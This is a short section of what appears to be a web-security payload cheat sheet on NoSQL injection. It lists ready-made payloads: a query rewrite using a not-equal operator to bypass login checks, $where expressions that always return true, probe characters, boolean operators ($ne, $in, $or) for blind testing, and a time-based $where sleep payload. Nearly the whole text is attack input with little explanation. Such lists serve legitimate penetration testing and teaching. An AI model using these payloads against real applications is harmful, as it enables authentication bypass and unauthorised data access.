4.1.7.6. NoSQL Payload

4.1.7.6.1. Common Payload

• Bypass restrictions

  • {"username": "user"} => {"username": {"ne": "fakeuser"}}

  • {"$where":  "return true"}

• test characters

  • '"\/$[].>

• Boolean tests are commonly used

  • {"$ne": -1}

  • {"$in": []}

  • {"$where":  "return true"}

  • {"$or": [{},{"foo":"1"}]}

• time

  • {"$where":  "sleep(100)"}